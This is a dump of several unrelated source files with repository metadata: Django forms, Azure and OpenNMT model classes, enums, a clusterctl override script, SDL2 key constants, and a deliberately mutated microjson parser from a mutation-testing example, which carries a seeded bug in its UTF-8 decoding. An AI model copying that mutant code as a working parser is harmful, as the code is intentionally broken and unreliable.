4a2578e257354af6778382a0bfc368377e2379ac | 1,423 | py | Python | area51/forms.py | tailorv/neighbourshood | f9470ba1f9bb8c995d0b8ae93e90316285226026 | [
"Unlicense"
] | 1 | 2020-10-31T16:19:23.000Z | 2020-10-31T16:19:23.000Z | area51/forms.py | tailorv/neighbourshood | f9470ba1f9bb8c995d0b8ae93e90316285226026 | [
"Unlicense"
] | null | null | null | area51/forms.py | tailorv/neighbourshood | f9470ba1f9bb8c995d0b8ae93e90316285226026 | [
"Unlicense"
] | null | null | null | from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from .models import Profile, Post, Business, Services, Neighbourhood
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class UserUpdateForm(forms.ModelForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email']
class ProfileUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['profile_photo', 'bio']
class PostUploadForm(forms.ModelForm):
class Meta:
model = Post
fields = ['title', 'post']
def form_valid(self, form):
form.instance.user = self.request.profile
return super().form_valid(form)
class BizUploadForm(forms.ModelForm):
class Meta:
model = Business
fields = ['biz_name', 'biz_description', 'biz_digits', 'biz_email' ]
def form_valid(self, form):
form.instance.user = self.request.profile
return super().form_valid(form)
class HoodForm(forms.ModelForm):
class Meta:
model = Neighbourhood
fields = ['hood_name', 'hood_location', 'family_size']
def form_valid(self, form):
form.instance.user = self.request.profile
return super().form_valid(form) | 28.46 | 76 | 0.663387 |
4a257ce263366e958e45f853c44bd1e43701491e | 8,310 | py | Python | examples/microjson/mutants/CRP_Num_mutant_1486201294.py | Anirban166/tstl | 73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e | [
"Apache-2.0"
] | 90 | 2015-04-07T10:26:53.000Z | 2022-03-07T15:14:57.000Z | examples/microjson/mutants/CRP_Num_mutant_1486201294.py | Anirban166/tstl | 73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e | [
"Apache-2.0"
] | 14 | 2015-10-13T16:25:59.000Z | 2021-01-21T18:31:03.000Z | examples/microjson/mutants/CRP_Num_mutant_1486201294.py | Anirban166/tstl | 73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e | [
"Apache-2.0"
] | 32 | 2015-04-07T10:41:29.000Z | 2022-02-26T05:17:28.000Z | import math
import StringIO
import types
__pychecker__ = 'no-returnvalues'
WS = set([' ', '\t', '\r', '\n', '\x08', '\x0c'])
DIGITS = set([str(i) for i in range(0, 10)])
NUMSTART = DIGITS.union(['.', '-', '+'])
NUMCHARS = NUMSTART.union(['e', 'E'])
ESC_MAP = {'n': '\n', 't': '\t', 'r': '\r', 'b': '\x08', 'f': '\x0c'}
REV_ESC_MAP = dict([(_v, _k) for (_k, _v) in ESC_MAP.items()] + [('"', '"')])
E_BYTES = 'input string must be type str containing ASCII or UTF-8 bytes'
E_MALF = 'malformed JSON data'
E_TRUNC = 'truncated JSON data'
E_BOOL = 'expected boolean'
E_NULL = 'expected null'
E_LITEM = 'expected list item'
E_DKEY = 'expected key'
E_COLON = 'missing colon after key'
E_EMPTY = 'found empty string, not valid JSON data'
E_BADESC = 'bad escape character found'
E_UNSUPP = 'unsupported type "%s" cannot be JSON-encoded'
E_BADFLOAT = 'cannot emit floating point value "%s"'
NEG_INF = float('-inf')
POS_INF = float('inf')
class JSONError(Exception):
def __init__(self, msg, stm=None, pos=0):
if stm:
msg += ' at position %d, "%s"' % (pos, repr(stm.substr(pos, 32)))
Exception.__init__(self, msg)
class JSONStream(object):
def __init__(self, data):
self._stm = StringIO.StringIO(data)
@property
def pos(self):
return self._stm.pos
@property
def len(self):
return self._stm.len
def getvalue(self):
return self._stm.getvalue()
def skipspaces(self):
'post-cond: read pointer will be over first non-WS char'
self._skip(lambda c: (c not in WS))
def _skip(self, stopcond):
while True:
c = self.peek()
if (stopcond(c) or (c == '')):
break
self.next()
def next(self, size=1):
return self._stm.read(size)
def next_ord(self):
return ord(self.next())
def peek(self):
if (self.pos == self.len):
return ''
return self.getvalue()[self.pos]
def substr(self, pos, length):
return self.getvalue()[pos:pos + length]
def _decode_utf8(c0, stm):
c0 = ord(c0)
r = 65533
nc = stm.next_ord
if (c0 & 224 == 192):
r = c0 & 31 << 6 + nc() & 63
elif (c0 & 240 == 224):
r = c0 & 15 << 12 + nc() & 63 << 6 + nc() & 63
elif (c0 & 0 == 240):
r = c0 & 7 << 18 + nc() & 63 << 12 + nc() & 63 << 6 + nc() & 63
return unichr(r)
def decode_escape(c, stm):
v = ESC_MAP.get(c, None)
if (v is not None):
return v
elif (c != 'u'):
return c
sv = 12
r = 0
for _ in range(0, 4):
r |= int(stm.next(), 16) << sv
sv -= 4
return unichr(r)
def _from_json_string(stm):
stm.next()
r = []
while True:
c = stm.next()
if (c == ''):
raiseJSONError(E_TRUNC, stm, stm.pos - 1)
elif (c == '\\'):
c = stm.next()
r.append(decode_escape(c, stm))
elif (c == '"'):
return ''.join(r)
elif (c > '\x7f'):
r.append(_decode_utf8(c, stm))
else:
r.append(c)
def _from_json_fixed(stm, expected, value, errmsg):
off = len(expected)
pos = stm.pos
if (stm.substr(pos, off) == expected):
stm.next(off)
return value
raiseJSONError(errmsg, stm, pos)
def _from_json_number(stm):
is_float = 0
saw_exp = 0
pos = stm.pos
while True:
c = stm.peek()
if (c not in NUMCHARS):
break
elif ((c == '-') and (not saw_exp)):
pass
elif (c in ('.', 'e', 'E')):
is_float = 1
if (c in ('e', 'E')):
saw_exp = 1
stm.next()
s = stm.substr(pos, stm.pos - pos)
if is_float:
return float(s)
return long(s)
def _from_json_list(stm):
stm.next()
result = []
pos = stm.pos
while True:
stm.skipspaces()
c = stm.peek()
if (c == ''):
raiseJSONError(E_TRUNC, stm, pos)
elif (c == ']'):
stm.next()
return result
elif (c == ','):
stm.next()
result.append(_from_json_raw(stm))
continue
elif (not result):
result.append(_from_json_raw(stm))
continue
else:
raiseJSONError(E_MALF, stm, stm.pos)
def _from_json_dict(stm):
stm.next()
result = {}
expect_key = 0
pos = stm.pos
while True:
stm.skipspaces()
c = stm.peek()
if (c == ''):
raiseJSONError(E_TRUNC, stm, pos)
if (c in ('}', ',')):
stm.next()
if expect_key:
raiseJSONError(E_DKEY, stm, stm.pos)
if (c == '}'):
return result
expect_key = 1
continue
elif (c == '"'):
key = _from_json_string(stm)
stm.skipspaces()
c = stm.next()
if (c != ':'):
raiseJSONError(E_COLON, stm, stm.pos)
stm.skipspaces()
val = _from_json_raw(stm)
result[key] = val
expect_key = 0
continue
raiseJSONError(E_MALF, stm, stm.pos)
def _from_json_raw(stm):
while True:
stm.skipspaces()
c = stm.peek()
if (c == '"'):
return _from_json_string(stm)
elif (c == '{'):
return _from_json_dict(stm)
elif (c == '['):
return _from_json_list(stm)
elif (c == 't'):
return _from_json_fixed(stm, 'true', True, E_BOOL)
elif (c == 'f'):
return _from_json_fixed(stm, 'false', False, E_BOOL)
elif (c == 'n'):
return _from_json_fixed(stm, 'null', None, E_NULL)
elif (c in NUMSTART):
return _from_json_number(stm)
raiseJSONError(E_MALF, stm, stm.pos)
def from_json(data):
"\n Converts 'data' which is UTF-8 (or the 7-bit pure ASCII subset) into\n a Python representation. You must pass bytes to this in a str type,\n not unicode.\n "
if (not isinstance(data, str)):
raiseJSONError(E_BYTES)
if (not data):
return None
stm = JSONStream(data)
return _from_json_raw(stm)
def _to_json_list(stm, lst):
seen = 0
stm.write('[')
for elem in lst:
if seen:
stm.write(',')
seen = 1
_to_json_object(stm, elem)
stm.write(']')
def _to_json_string(stm, buf):
stm.write('"')
for c in buf:
nc = REV_ESC_MAP.get(c, None)
if nc:
stm.write('\\' + nc)
elif (ord(c) <= 127):
stm.write(str(c))
else:
stm.write('\\u%04x' % ord(c))
stm.write('"')
def _to_json_dict(stm, dct):
seen = 0
stm.write('{')
for key in dct.keys():
if seen:
stm.write(',')
seen = 1
val = dct[key]
if (not (type(key) in (types.StringType, types.UnicodeType))):
key = str(key)
_to_json_string(stm, key)
stm.write(':')
_to_json_object(stm, val)
stm.write('}')
def _to_json_object(stm, obj):
if isinstance(obj, (types.ListType, types.TupleType)):
_to_json_list(stm, obj)
elif isinstance(obj, types.BooleanType):
if obj:
stm.write('true')
else:
stm.write('false')
elif isinstance(obj, types.FloatType):
if (not (NEG_INF < obj < POS_INF)):
raiseJSONError(E_BADFLOAT % obj)
stm.write('%s' % obj)
elif isinstance(obj, (types.IntType, types.LongType)):
stm.write('%d' % obj)
elif isinstance(obj, types.NoneType):
stm.write('null')
elif isinstance(obj, (types.StringType, types.UnicodeType)):
_to_json_string(stm, obj)
elif (hasattr(obj, 'keys') and hasattr(obj, '__getitem__')):
_to_json_dict(stm, obj)
elif hasattr(obj, '__unicode__'):
_to_json_string(stm, obj.__unicode__())
elif hasattr(obj, '__str__'):
_to_json_string(stm, obj.__str__())
else:
raiseJSONError(E_UNSUPP % type(obj))
def to_json(obj):
"\n Converts 'obj' to an ASCII JSON string representation.\n "
stm = StringIO.StringIO('')
_to_json_object(stm, obj)
return stm.getvalue()
decode = from_json
encode = to_json | 27.885906 | 178 | 0.526354 |
4a257da54ffc485c8a9cf6c68bfb81426d784fae | 558 | py | Python | jolokia/exceptions.py | minsis/python-jolokia | 10d275b8507fec4ea340b112864c7e6068540e58 | [
"Apache-2.0"
] | null | null | null | jolokia/exceptions.py | minsis/python-jolokia | 10d275b8507fec4ea340b112864c7e6068540e58 | [
"Apache-2.0"
] | null | null | null | jolokia/exceptions.py | minsis/python-jolokia | 10d275b8507fec4ea340b112864c7e6068540e58 | [
"Apache-2.0"
] | null | null | null | """Custom exceptions for for various modules in Jolokia Python client"""
class UrlNotSpecifiedException(Exception):
"""Indicates that Jolokia agent URL has not been provided"""
pass
class MalformedUrlException(Exception):
"""Indicates that the Jolokia agent URL is malformed"""
pass
class IllegalArgumentException(Exception):
"""Generic exception for enforcing required arguments"""
pass
class MissingEnvironmentVariableException(Exception):
"""Should be thrown when expected environment variable is not found"""
pass
| 25.363636 | 74 | 0.75448 |
4a257e6247d44b7cd16c58b7f104a309577b31af | 2,616 | py | Python | azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_update_parameters_py3.py | NMijat1024/azure-sdk-for-python | c49e1d6d797dceaca81813cafb1a486d67185182 | [
"MIT"
] | null | null | null | azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_update_parameters_py3.py | NMijat1024/azure-sdk-for-python | c49e1d6d797dceaca81813cafb1a486d67185182 | [
"MIT"
] | 1 | 2018-11-29T14:46:42.000Z | 2018-11-29T14:46:42.000Z | azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_update_parameters_py3.py | NMijat1024/azure-sdk-for-python | c49e1d6d797dceaca81813cafb1a486d67185182 | [
"MIT"
] | 1 | 2018-08-28T14:36:47.000Z | 2018-08-28T14:36:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TaskUpdateParameters(Model):
"""The parameters for updating a task.
:param status: The current status of task. Possible values include:
'Disabled', 'Enabled'
:type status: str or
~azure.mgmt.containerregistry.v2018_09_01.models.TaskStatus
:param platform: The platform properties against which the run has to
happen.
:type platform:
~azure.mgmt.containerregistry.v2018_09_01.models.PlatformUpdateParameters
:param agent_configuration: The machine configuration of the run agent.
:type agent_configuration:
~azure.mgmt.containerregistry.v2018_09_01.models.AgentProperties
:param timeout: Run timeout in seconds.
:type timeout: int
:param step: The properties for updating a task step.
:type step:
~azure.mgmt.containerregistry.v2018_09_01.models.TaskStepUpdateParameters
:param trigger: The properties for updating trigger properties.
:type trigger:
~azure.mgmt.containerregistry.v2018_09_01.models.TriggerUpdateParameters
:param tags: The ARM resource tags.
:type tags: dict[str, str]
"""
_attribute_map = {
'status': {'key': 'properties.status', 'type': 'str'},
'platform': {'key': 'properties.platform', 'type': 'PlatformUpdateParameters'},
'agent_configuration': {'key': 'properties.agentConfiguration', 'type': 'AgentProperties'},
'timeout': {'key': 'properties.timeout', 'type': 'int'},
'step': {'key': 'properties.step', 'type': 'TaskStepUpdateParameters'},
'trigger': {'key': 'properties.trigger', 'type': 'TriggerUpdateParameters'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(self, *, status=None, platform=None, agent_configuration=None, timeout: int=None, step=None, trigger=None, tags=None, **kwargs) -> None:
super(TaskUpdateParameters, self).__init__(**kwargs)
self.status = status
self.platform = platform
self.agent_configuration = agent_configuration
self.timeout = timeout
self.step = step
self.trigger = trigger
self.tags = tags
| 43.6 | 153 | 0.655581 |
4a257f3bb55c6b0f3b0e9b1d09fab92cd787b206 | 1,865 | py | Python | utilities/scm_enums.py | daotranminh/SCM | 6681a49999cbd089032e25a441572e9a1f166897 | [
"MIT"
] | null | null | null | utilities/scm_enums.py | daotranminh/SCM | 6681a49999cbd089032e25a441572e9a1f166897 | [
"MIT"
] | null | null | null | utilities/scm_enums.py | daotranminh/SCM | 6681a49999cbd089032e25a441572e9a1f166897 | [
"MIT"
] | null | null | null | from enum import IntEnum
class ErrorCodes(IntEnum):
SUCCESS = 0
ERROR_ADD_MATERIAL_FAILED = 1
ERROR_ADD_MATERIAL_VERSION_FAILED = 2
ERROR_ADD_CUSTOMER_FAILED = 3
ERROR_ADD_TASTE_FAILED = 4
ERROR_ADD_TOPIC_FAILED = 5
ERROR_UPDATE_TOPIC_FAILED = 6
ERROR_ADD_MATERIAL_SUBFORMULA_FAILED = 7
ERROR_ADD_SUBFORMULA_FAILED = 8
ERROR_ADD_DECORATIONFAILED = 9
ERROR_ADD_DECORATION_FORM_FAILED = 10
ERROR_ADD_DECORATION_TECHNIQUE_FAILED = 11
ERROR_ADD_DECORATION_TEMPLATE_PATH_FAILED = 12
ERROR_ADD_ORDER_FAILED = 13
ERROR_ADD_SAMPLE_IMAGE_PATH_FAILED = 14
ERROR_DELETE_SAMPLE_IMAGE_PATH_FAILED = 15
ERROR_ADD_SAMPLE_IMAGES_GROUP_FAILED = 16
ERROR_DELETE_SAMPLE_IMAGES_GROUP_FAILED = 17
ERROR_ADD_PRODUCT_FAILED = 18
ERROR_ADD_PRODUCT_IMAGE_PATH_FAILED = 19
ERROR_DELETE_PRODUCT_FAILED = 20
ERROR_ORDER_STATUS_KEY_NOT_EXIST = 21
ERROR_PAYMENT_STATUS_KEY_NOT_EXIST = 22
ERROR_ADD_MATERIAL_VERSION_COST_ESTIMATION_FAILED = 23
ERROR_ADD_COST_ESTIMATION_FAILED = 24
ERROR_ADD_FORMULA_FAILED = 25
ERROR_ADD_FORMULA_SUBFORMULA_FAILED = 26
ERROR_ADD_PRODUCT_COST_ESTIMATION_FAILED = 27
ERROR_ADD_FIXED_MATERIAL_SUBFORMULA_FAILED = 28
ERROR_ADD_FIXED_SUBFORMULA_FAILED = 29
ERROR_ADD_FIXED_FORMULA_FAILED = 30
ERROR_ADD_PLATE_FAILED = 31
ERROR_ADD_BOX_FAILED = 32
ERROR_ADD_FIXED_PLATE_FAILED = 33
ERROR_ADD_FIXED_BOX_FAILED = 34
class PaymentStatus(IntEnum):
NOT_PAID = 0
PARTLY_PAID = 1
FULLY_PAID = 2
class BoxStatus(IntEnum):
BOX_NOT_NEEDED_TO_BE_RETURNED = 0
BOX_WITH_PRODUCT_IN_PRODUCTION = 1
BOX_AT_CUSTOMER_AFTER_DELIVERY = 2
BOX_RETURNED = 3
class OrderStatus(IntEnum):
PENDING = 0
IN_PRODUCTION = 1
DELIVERED = 2
class SubFormulaTypes(IntEnum):
BASE = 0
FILLING = 1
CREAM = 2
| 30.57377 | 58 | 0.775335 |
4a257f40bfc1b2f7260b0bfba29fc7e221bfb4fd | 6,942 | py | Python | cmd/clusterctl/hack/local-overrides.py | colinlodter/cluster-api | 3c4dff9e48320437fa7a205ee23c143f27cf52eb | [
"Apache-2.0"
] | null | null | null | cmd/clusterctl/hack/local-overrides.py | colinlodter/cluster-api | 3c4dff9e48320437fa7a205ee23c143f27cf52eb | [
"Apache-2.0"
] | null | null | null | cmd/clusterctl/hack/local-overrides.py | colinlodter/cluster-api | 3c4dff9e48320437fa7a205ee23c143f27cf52eb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2020 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###################
# local-overrides.py takes in input a list of provider and, for each of them, generates the components YAML from the
# local repositories (the GitHub repositories clone), and finally stores it in the clusterctl local override folder
# prerequisites:
# - the script should be executed from sigs.k8s.io/cluster-api/ by calling cmd/clusterctl/hack/local-overrides.py
# - there should be a sigs.k8s.io/cluster-api/clusterctl-settings.json file with the list of provider for which
# the local overrides should be generated and the list of provider repositories to be included (on top of cluster-api).
# {
# "providers": [ "cluster-api", "kubeadm-bootstrap", "aws"],
# "provider_repos": ["../cluster-api-provider-aws"]
# }
# - for each additional provider repository there should be a sigs.k8s.io/<provider_repo>/clusterctl-settings.json file e.g.
# {
# "name": "aws",
# "config": {
# "componentsFile": "infrastructure-components.yaml",
# "nextVersion": "v0.5.0",
# "type": "InfrastructureProvider"
# }
###################
from __future__ import unicode_literals
import json
import subprocess
import os
import errno
import sys
settings = {}
providers = {
'cluster-api': {
'componentsFile': 'core-components.yaml',
'nextVersion': 'v0.3.0',
'type': 'CoreProvider',
},
'kubeadm-bootstrap': {
'componentsFile': 'bootstrap-components.yaml',
'nextVersion': 'v0.3.0',
'type': 'BootstrapProvider',
'configFolder': 'bootstrap/kubeadm/config/default',
},
'docker': {
'componentsFile': 'infrastructure-components.yaml',
'nextVersion': 'v0.3.0',
'type': 'InfrastructureProvider',
'configFolder': 'test/infrastructure/docker/config/default',
},
}
validTypes = ['CoreProvider','BootstrapProvider','InfrastructureProvider']
def load_settings():
global settings
try:
settings = json.load(open('clusterctl-settings.json'))
except Exception as e:
raise Exception('failed to load clusterctl-settings.json: {}'.format(e))
def load_providers():
provider_repos = settings.get('provider_repos', [])
for repo in provider_repos:
file = repo + '/clusterctl-settings.json'
try:
provider_details = json.load(open(file))
provider_name = provider_details['name']
provider_config = provider_details['config']
provider_config['repo'] = repo
providers[provider_name] = provider_config
except Exception as e:
raise Exception('failed to load clusterctl-settings.json from repo {}: {}'.format(repo, e))
def execCmd(args):
try:
out = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = out.communicate()
if stderr is not None:
raise Exception('stderr contains: \n{}'.format(stderr))
return stdout
except Exception as e:
raise Exception('failed to run {}: {}'.format(args, e))
def get_home():
return os.path.expanduser('~')
def write_local_override(provider, version, components_file, components_yaml):
try:
home = get_home()
overrides_folder = os.path.join(home, '.cluster-api', 'overrides')
provider_overrides_folder = os.path.join(overrides_folder, provider, version)
try:
os.makedirs(provider_overrides_folder)
except OSError as e:
if e.errno != errno.EEXIST:
raise
f = open(os.path.join(provider_overrides_folder, components_file), 'wb')
f.write(components_yaml)
f.close()
except Exception as e:
raise Exception('failed to write {} to {}: {}'.format(components_file, provider_overrides_folder, e))
def create_local_overrides():
providerList = settings.get('providers', [])
assert providerList is not None, 'invalid configuration: please define the list of providers to override'
assert len(providerList)>0, 'invalid configuration: please define at least one provider to override'
for provider in providerList:
p = providers.get(provider)
assert p is not None, 'invalid configuration: please specify the configuration for the {} provider'.format(provider)
repo = p.get('repo', '.')
config_folder = p.get('configFolder', 'config/default')
next_version = p.get('nextVersion')
assert next_version is not None, 'invalid configuration for provider {}: please provide nextVersion value'.format(provider)
type = p.get('type')
assert type is not None, 'invalid configuration for provider {}: please provide type value'.format(provider)
assert type in validTypes, 'invalid configuration for provider {}: please use one of {}'.format(provider, ', '.join(validTypes))
components_file = p.get('componentsFile')
assert components_file is not None, 'invalid configuration for provider {}: please provide componentsFile value'.format(provider)
components_yaml = execCmd(['kustomize', 'build', os.path.join(repo, config_folder)])
write_local_override(provider, next_version, components_file, components_yaml)
yield provider, type, next_version
def CoreProviderFlag():
return '--core'
def BootstrapProviderFlag():
return '--bootstrap'
def InfrastructureProviderFlag():
return '--infrastructure'
def type_to_flag(type):
switcher = {
'CoreProvider': CoreProviderFlag,
'BootstrapProvider': BootstrapProviderFlag,
'InfrastructureProvider': InfrastructureProviderFlag
}
func = switcher.get(type, lambda: 'Invalid type')
return func()
def print_instructions(overrides):
providerList = settings.get('providers', [])
print ('clusterctl local overrides generated from local repositories for the {} providers.'.format(', '.join(providerList)))
print ('in order to use them, please run:')
print
cmd = 'clusterctl init'
for provider, type, next_version in overrides:
cmd += ' {} {}:{}'.format(type_to_flag(type), provider, next_version)
print (cmd)
print
load_settings()
load_providers()
overrides = create_local_overrides()
print_instructions(overrides)
| 36.34555 | 137 | 0.673581 |
4a257f6cfaaf937edd2f7e4a2744ee5a99463e05 | 1,051 | py | Python | src/battle_CUI.py | srpkdyy/reversi | 93977f1d1787e78e80a3fecb6753747ba3eed979 | [
"MIT"
] | null | null | null | src/battle_CUI.py | srpkdyy/reversi | 93977f1d1787e78e80a3fecb6753747ba3eed979 | [
"MIT"
] | null | null | null | src/battle_CUI.py | srpkdyy/reversi | 93977f1d1787e78e80a3fecb6753747ba3eed979 | [
"MIT"
] | null | null | null | from envs.board import Board
from agents.human import Human
from agents.randomer import Randomer
def main():
field = Board()
field.render()
#player1 = Human()
player1 = Randomer()
player2 = Randomer()
#player2 = Human()
players = (player1, player2)
field.setup_player(player1)
field.setup_player(player2)
turn = 0
while not field.is_game_set():
player = players[turn%2]
color = player.get_piece_color()
turn += 1
if not field.exist_legal_move(color):
continue
player.update(field.get_board_state())
put_pos = (0, 0)
while not field.can_be_put(color, put_pos):
put_pos = player.move()
field.put_a_piece(color, put_pos)
field.render()
winner, n_black, n_white, last_field = field.get_game_result()
print(winner + ' is winner.')
print('black:' + str(n_black))
print('white:' + str(n_white))
print(last_field)
if __name__ == '__main__':
main()
| 21.44898 | 66 | 0.597526 |
4a25804993fbb63265dd3676581c6547134a169d | 622 | py | Python | leetcode-python/num001.py | shuaizi/leetcode | c943410575f380a00335bf5ac8d361af53a92d78 | [
"Apache-2.0"
] | null | null | null | leetcode-python/num001.py | shuaizi/leetcode | c943410575f380a00335bf5ac8d361af53a92d78 | [
"Apache-2.0"
] | null | null | null | leetcode-python/num001.py | shuaizi/leetcode | c943410575f380a00335bf5ac8d361af53a92d78 | [
"Apache-2.0"
] | null | null | null | __author__ = 'shuai'
class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
for i in range(len(nums) - 1):
for j in range(i+1, len(nums)):
if nums[i] + nums[j] == target:
return [nums[i], nums[j]]
def twoSum2(self, nums, target):
dic = {}
for i in range(len(nums)):
if target - nums[i] in dic:
return [i, dic[target - nums[i]]]
dic[nums[i]] = i
sol = Solution()
sol.twoSum([2, 7, 11, 15], 9)
| 25.916667 | 49 | 0.466238 |
4a25807d9b3fd18292d98ba58abd64f0c19852ad | 1,931 | py | Python | onmt/models/model.py | kanghj/OpenNMT-py | 759d5b5a663ee8de3da781ba57f19b3873024753 | [
"MIT"
] | null | null | null | onmt/models/model.py | kanghj/OpenNMT-py | 759d5b5a663ee8de3da781ba57f19b3873024753 | [
"MIT"
] | null | null | null | onmt/models/model.py | kanghj/OpenNMT-py | 759d5b5a663ee8de3da781ba57f19b3873024753 | [
"MIT"
] | null | null | null | """ Onmt NMT Model base class definition """
import torch.nn as nn
class NMTModel(nn.Module):
"""
Core trainable object in OpenNMT. Implements a trainable interface
for a simple, generic encoder + decoder model.
Args:
encoder (:obj:`EncoderBase`): an encoder object
decoder (:obj:`RNNDecoderBase`): a decoder object
"""
def __init__(self, encoder, decoder):
super(NMTModel, self).__init__()
self.encoder = encoder
self.decoder = decoder
def forward(self, src, tgt, lengths, bptt=False):
"""Forward propagate a `src` and `tgt` pair for training.
Possible initialized with a beginning decoder state.
Args:
src (:obj:`Tensor`):
a source sequence passed to encoder.
typically for inputs this will be a padded :obj:`LongTensor`
of size `[len x batch x features]`. however, may be an
image or other generic input depending on encoder.
tgt (:obj:`LongTensor`):
a target sequence of size `[tgt_len x batch]`.
lengths(:obj:`LongTensor`): the src lengths, pre-padding `[batch]`.
bptt (:obj:`Boolean`):
a flag indicating if truncated bptt is set. If reset then
init_state
Returns:
(:obj:`FloatTensor`, `dict`, :obj:`onmt.Models.DecoderState`):
* decoder output `[tgt_len x batch x hidden]`
* dictionary attention dists of `[tgt_len x batch x src_len]`
"""
tgt = tgt[:-1] # exclude last target from inputs
enc_state, memory_bank, lengths = self.encoder(src, lengths)
if bptt is False:
self.decoder.init_state(src, memory_bank, enc_state)
dec_out, attns = self.decoder(tgt, memory_bank,
memory_lengths=lengths)
return dec_out, attns
| 37.862745 | 79 | 0.58985 |
4a2581fc941294530b98a445ee1e897c468d04e8 | 2,159 | py | Python | moderngl_window/context/sdl2/keys.py | minuJeong/moderngl-window | 6386478f1e6b07cefda8f4d9324d972ab88b34ec | [
"MIT"
] | null | null | null | moderngl_window/context/sdl2/keys.py | minuJeong/moderngl-window | 6386478f1e6b07cefda8f4d9324d972ab88b34ec | [
"MIT"
] | null | null | null | moderngl_window/context/sdl2/keys.py | minuJeong/moderngl-window | 6386478f1e6b07cefda8f4d9324d972ab88b34ec | [
"MIT"
] | null | null | null | # flake8: noqa E741
import sdl2
from moderngl_window.context.base import BaseKeys
class Keys(BaseKeys):
"""
Namespace mapping SDL2 specific key constants
"""
ACTION_PRESS = sdl2.SDL_KEYDOWN
ACTION_RELEASE = sdl2.SDL_KEYUP
ESCAPE = sdl2.SDLK_ESCAPE
SPACE = sdl2.SDLK_SPACE
ENTER = sdl2.SDLK_RETURN
PAGE_UP = sdl2.SDLK_PAGEUP
PAGE_DOWN = sdl2.SDLK_PAGEDOWN
LEFT = sdl2.SDLK_LEFT
RIGHT = sdl2.SDLK_RIGHT
UP = sdl2.SDLK_UP
DOWN = sdl2.SDLK_DOWN
TAB = sdl2.SDLK_TAB
COMMA = sdl2.SDLK_COMMA
MINUS = sdl2.SDLK_MINUS
PERIOD = sdl2.SDLK_PERIOD
SLASH = sdl2.SDLK_SLASH
SEMICOLON = sdl2.SDLK_SEMICOLON
EQUAL = sdl2.SDLK_EQUALS
LEFT_BRACKET = sdl2.SDLK_LEFTBRACKET
RIGHT_BRACKET = sdl2.SDLK_RIGHTBRACKET
BACKSLASH = sdl2.SDLK_BACKSLASH
BACKSPACE = sdl2.SDLK_BACKSPACE
INSERT = sdl2.SDLK_INSERT
DELETE = sdl2.SDLK_DELETE
HOME = sdl2.SDLK_HOME
END = sdl2.SDLK_END
CAPS_LOCK = sdl2.SDLK_CAPSLOCK
F1 = sdl2.SDLK_F1
F2 = sdl2.SDLK_F2
F3 = sdl2.SDLK_F3
F4 = sdl2.SDLK_F4
F5 = sdl2.SDLK_F5
F6 = sdl2.SDLK_F6
F7 = sdl2.SDLK_F7
F8 = sdl2.SDLK_F8
F9 = sdl2.SDLK_F9
F10 = sdl2.SDLK_F10
F11 = sdl2.SDLK_F11
F12 = sdl2.SDLK_F12
NUMBER_0 = sdl2.SDLK_0
NUMBER_1 = sdl2.SDLK_1
NUMBER_2 = sdl2.SDLK_2
NUMBER_3 = sdl2.SDLK_3
NUMBER_4 = sdl2.SDLK_4
NUMBER_5 = sdl2.SDLK_5
NUMBER_6 = sdl2.SDLK_6
NUMBER_7 = sdl2.SDLK_7
NUMBER_8 = sdl2.SDLK_8
NUMBER_9 = sdl2.SDLK_9
A = sdl2.SDLK_a
B = sdl2.SDLK_b
C = sdl2.SDLK_c
D = sdl2.SDLK_d
E = sdl2.SDLK_e
F = sdl2.SDLK_f
G = sdl2.SDLK_g
H = sdl2.SDLK_h
I = sdl2.SDLK_i
J = sdl2.SDLK_j
K = sdl2.SDLK_k
L = sdl2.SDLK_l
M = sdl2.SDLK_m
N = sdl2.SDLK_n
O = sdl2.SDLK_o
P = sdl2.SDLK_p
Q = sdl2.SDLK_q
R = sdl2.SDLK_r
S = sdl2.SDLK_s
T = sdl2.SDLK_t
U = sdl2.SDLK_u
V = sdl2.SDLK_v
W = sdl2.SDLK_w
X = sdl2.SDLK_x
Y = sdl2.SDLK_y
Z = sdl2.SDLK_z
| 23.725275 | 50 | 0.621121 |
4a25823b958cf34775ee722649353a1de7e89270 | 396 | py | Python | mi/types/bot.py | gitter-badger/Mi.py | ef6611c93c8a5237ec9d51ff89e845b85771e070 | [
"MIT"
] | 13 | 2021-09-14T02:47:23.000Z | 2022-02-27T16:48:09.000Z | mi/types/bot.py | gitter-badger/Mi.py | ef6611c93c8a5237ec9d51ff89e845b85771e070 | [
"MIT"
] | 62 | 2021-08-28T10:56:55.000Z | 2022-03-30T06:47:28.000Z | mi/types/bot.py | gitter-badger/Mi.py | ef6611c93c8a5237ec9d51ff89e845b85771e070 | [
"MIT"
] | 3 | 2021-12-23T20:10:57.000Z | 2022-03-30T13:19:49.000Z | from abc import ABC, abstractmethod
from typing import Any, Dict, Optional
class AbstractBotBase(ABC):
@abstractmethod
async def dispatch(self, event_name: Optional[str] = None, *args: tuple[Any], **kwargs: Dict[Any, Any]):
pass
@abstractmethod
